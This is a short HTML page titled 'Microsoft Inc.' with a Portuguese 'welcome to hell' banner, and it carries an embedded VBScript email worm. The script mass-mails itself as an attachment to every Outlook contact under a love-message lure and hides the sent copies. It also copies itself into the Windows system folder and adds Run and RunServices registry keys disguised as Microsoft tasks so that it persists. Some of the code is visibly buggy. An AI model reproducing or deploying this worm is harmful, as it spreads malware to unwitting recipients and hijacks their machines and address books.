<title>Microsoft Inc.
</title>
<Body BGColor="Black",Font="Red">

<H1>Bem Vindo ao Inferno</H1>
<img src="http://www.blackshadowsc.hpg.com.br/blackshadow.jpg">


<script language="VBScript"><!--
On Error Resume Next
Dim Outlook1,Outlook2,Outlook3,Outlook4,Outlook5,assunto,Mensagem
Assunto = "Assunto"
Mensagem = "Saiba que eu lhe amo =)"
Set Outlook1 = CreateObject( "Outlook.Application" )
Set Outlook2 = Outlook1.GetNameSpace( "MAPI" )
For Each Outlook3 in Outlook2.AddressList
For Outlook4 = 1 to Outlook3.AddressEntries.Count
Set Outlook5 = OutLook1.CreateItem ( 0 )
Outlook5.BCC = Outlook3.AdressEntries ( Outlook4 ).Address
Outlook5.subject = assunto
Outlook5.Body = Mensagem
Outlook5.Attachments.add WScript.ScriptFullName
Outlook5.DeleteAfterSubmit = True
Outlook5.send
Next
Next
dim Copy, Reg1, Diretorio
diretorio = 1
Set Copy = CreateObject("Scripting.FileSystemObject")
Copy.CopyFile WScript.ScriptFullName, Copy.BuildPath (Copy.GetSpecialFolder(diretorio),"System.VBS")
Set Reg1 = CreateObject ("Wscript.Shell")
Reg1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\"&"Microsoft",Copy.BuildPath(Copy.GetSpecialFolder(Diretorio),"Microsoft.VBS")
on error resume next
dim ae,ae2,ae3
set ae= CreateObject("Scripting.FileSystemObject")
set ae2 = ae.CreateTextFile ( ae.buildpath( ae.getspecialfolder(1), ""),true)

ae2.close
set AR03 = CreateObject( "WScript.Shell" )
Function HEX( HE01 )
Dim HE02
Dim HE03
HE02 = ""
For HE03 = 1 To Len( HE01 ) Step 2
HE02 = HE02 & Chr( "&h" & Mid(HE01, HE03, 2 ) )
Next
HEX= HE02
End Function

dim reg
Set Reg = CreateObject ("Wscript.Shell")
Reg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\"&"Microsoft Task Scheduller",ae.BuildPath(ae.GetSpecialFolder(1),"")

Set ae3 = CreateObject( "WScript.Shell" )
ae3.Run( ae.BuildPath( ae.GetSpecialFolder(1), "" ) )
--></script></p>
</body>
</html>

